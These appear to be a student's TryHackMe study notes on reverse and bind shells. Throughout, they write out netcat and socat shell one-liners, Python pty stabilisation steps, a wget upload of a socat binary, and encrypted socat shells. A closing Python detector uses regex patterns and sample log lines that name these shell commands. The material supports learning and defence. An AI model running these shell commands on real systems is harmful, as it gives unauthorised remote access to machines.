9. What the Shell?

Section nine in Complete Beginner learning path.

Introduction

At a high level, there are two kinds of shell that are important when exploiting a target: reverse shells, and bind shells.

A reverse shell is when a target is forced to execute code that connects back to your computer. On your own PC you will need to run a listener to receive the connection. Reverse shells are good for bypassing firewall rules; however, you will need to configure your own network to accept the shell.

A bind shell is when the code executed on the target starts a listener attached to a shell on the target. The port is then open on the internet, which allows you to connect to it and obtain RCE. This does not require any configuration on your machine, but it may be blocked by firewalls.

Reverse Shells

To set up a very, very basic reverse shell, run the command sudo nc -lvnp [port_number] on your machine, and run the command nc [local_ip] [port_number] -e /bin/bash on the target machine.

The options of the netcat listener break down as follows:

  • -l: tells netcat it will be a listener

  • -v: requests verbose output

  • -n: tells netcat not to resolve hostnames or use DNS

  • -p: indicates that the port specification follows

If you use a port number below port 1024 you will need to run this using sudo.

For a basic reverse shell listening using socat, the syntax is: socat TCP-L:[port] -. This takes two points and connects them together. We can use the following command on Windows to connect back to this: socat TCP:[LOCAL_IP]:[LOCAL_PORT] EXEC:powershell.exe,pipes. The "pipes" option is used to force PowerShell to use Unix standard input and output. The equivalent command in Linux is: socat TCP:[LOCAL_IP]:[LOCAL_PORT] EXEC:"bash -li".

Bind Shells

To set up a very, very basic bind shell, run the command nc -lvnp [port_number] -e "cmd.exe" on the target machine and run nc [IP_ADDR] [port_number] on your attacking machine.

To get a bind shell socat listener, we can run the following on Linux: socat TCP-L:[PORT] EXEC:"bash -li". On Windows, the equivalent listener is socat TCP-L:[PORT] EXEC:powershell.exe,pipes. From the attacking machine, connect to either with socat TCP:[TARGET_IP]:[TARGET_PORT] -.

Shell Stabilisation

Using Python:

  1. Run python -c 'import pty;pty.spawn("/bin/bash")', which uses Python to spawn a better bash shell. The interpreter name depends on the version of Python installed on the machine; to account for this, just replace the initial python with python2 or python3.

  2. Run export TERM=xterm, which will give us access to commands like clear.

  3. Finally, background this shell using CTRL + Z, then in your own terminal run stty raw -echo; fg. This turns off your own terminal's echo (giving access to autocompletion, arrow keys and CTRL + C to kill processes) and foregrounds the shell, completing the process.

Note: if this shell dies you will need to type reset and hit enter to restore your shell.

Using rlwrap:

rlwrap gives access to history, tab autocomplete, and the arrow keys immediately on getting the shell; however, manual stabilisation must be used to be able to use CTRL + C inside the shell. To install this run: sudo apt install rlwrap. To use rlwrap, invoke rlwrap nc -lvnp [port_number].

This method is most useful when dealing with Windows shells. When dealing with a Linux target you can fully stabilise by following step 3 of the Python technique: background the shell and run stty raw -echo; fg.

Using Socat:

Socat will only work on Linux for stabilisation. To use this method, a statically compiled socat binary must be uploaded to the target; this can be done using sudo python3 -m http.server 80 on your attacking machine and wget [IP_ADDR]/socat -O /tmp/socat on the target machine.

With these techniques it can also be useful to set the terminal size of the shell to match your own. To do this, open another terminal and run stty -a, which will show a number of "rows" and "columns". Back in the reverse/bind shell, run stty rows [NUMBER] and then stty cols [NUMBER], replacing [NUMBER] with the values you got from your own terminal.

To get a fully stable Linux tty reverse shell using socat, we can run: socat TCP-L:[PORT] FILE:`tty`,raw,echo=0.

Socat Encrypted Shells

Socat can create both bind and reverse encrypted shells. Encrypted shells cannot be read by anyone sniffing the traffic. To use encrypted shells we first need to generate a certificate; run this on the attacking machine:

openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

This creates a 2048-bit RSA key and matching certificate, valid for just under a year. When this command runs it will ask for information; this can be left blank or filled with nonsense. The two created files then need to be merged into a .pem file:

cat shell.key shell.crt > shell.pem

Now, when we set up the reverse shell listener, we use:

socat OPENSSL-LISTEN:[PORT],cert=shell.pem,verify=0 -

Here, the verify=0 option tells socat not to bother validating the certificate. The certificate must be used on whichever device is listening. To connect back to this we use:

socat OPENSSL:[LOCAL_IP]:[LOCAL_PORT],verify=0 EXEC:/bin/bash

The same technique applies for a bind shell, on the target run:

socat OPENSSL-LISTEN:[PORT],cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

On the attacker run:

socat OPENSSL:[TARGET_IP]:[TARGET_PORT],verify=0 -
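As an added defender-side example (not part of these notes or of TryHackMe's material), the following Python script flags process command lines that match the netcat, socat and Python pty one-liners covered in the Reverse Shells, Bind Shells, Shell Stabilisation and Socat Encrypted Shells sections, and labels each hit as a bind listener or a reverse connection. The log format, rule names and sample log lines are constructed assumptions, not a vendor ruleset.

```python
import re
# Indicators derived from the shell one-liners in these notes (constructed rules,
# not a vendor ruleset). Order matters: the more specific socat rule comes first.
SHELL_PATTERNS = [
    ("socat-tls-shell", re.compile(r"(^|\s)socat\s.*OPENSSL(-LISTEN)?:.*verify=0", re.I)),
    ("socat-exec-shell", re.compile(r"(^|\s)socat\s.*\bEXEC:", re.I)),
    ("netcat-exec-shell", re.compile(r"(^|\s)nc(at)?\s.*\s-e\s+\S*(sh|cmd\.exe|powershell)", re.I)),
    ("python-pty-spawn", re.compile(r"(^|\s)python[23]?\s.*pty\.spawn\(", re.I)),
]
LISTEN_ADDR = re.compile(r"(TCP4?-L|TCP4?-LISTEN|OPENSSL-LISTEN):", re.I)
LOG_LINE = re.compile(r"pid=(?P<pid>\d+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)")

def classify(cmdline):
    """Return {'rule', 'direction'} when a command line matches a shell pattern, else None."""
    for rule, pattern in SHELL_PATTERNS:
        if not pattern.search(cmdline):
            continue
        if rule.startswith("socat"):
            listener = LISTEN_ADDR.search(cmdline) is not None
        elif rule.startswith("netcat"):
            # netcat listens only when an option cluster carries -l (e.g. -lvnp); whole
            # tokens are checked so "bash -li" inside a socat address is not confused with it
            listener = any(re.fullmatch(r"-[a-z]*l[a-z]*", tok) for tok in cmdline.split())
        else:
            return {"rule": rule, "direction": "tty-upgrade"}  # pty.spawn opens no socket
        return {"rule": rule, "direction": "bind-listener" if listener else "reverse-connect"}
    return None

def scan_log(text):
    """Parse 'pid=.. user=.. cmd=..' lines; return one finding per suspicious process."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        hit = classify(m["cmd"]) if m else None
        if hit:
            findings.append({"pid": int(m["pid"]), "user": m["user"], **hit})
    return findings

# Constructed sample of a process-creation log (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
pid=1201 user=www-data cmd=nc 192.0.2.10 4444 -e /bin/bash
pid=1202 user=root cmd=nc -lvnp 4444 -e "cmd.exe"
pid=1203 user=www-data cmd=socat TCP:192.0.2.10:53 EXEC:"bash -li"
pid=1204 user=www-data cmd=socat OPENSSL-LISTEN:443,cert=shell.pem,verify=0 EXEC:/bin/bash
pid=1205 user=www-data cmd=python3 -c import pty;pty.spawn("/bin/bash")
pid=1206 user=alice cmd=nc -zv db.internal 5432
pid=1207 user=bob cmd=socat -d -d TCP-L:8080,fork TCP:backend:80
"""

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```

The last two sample lines are benign uses of the same tools (a port check and a plain TCP relay) and produce no finding, which is the false-positive case such a rule must handle.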
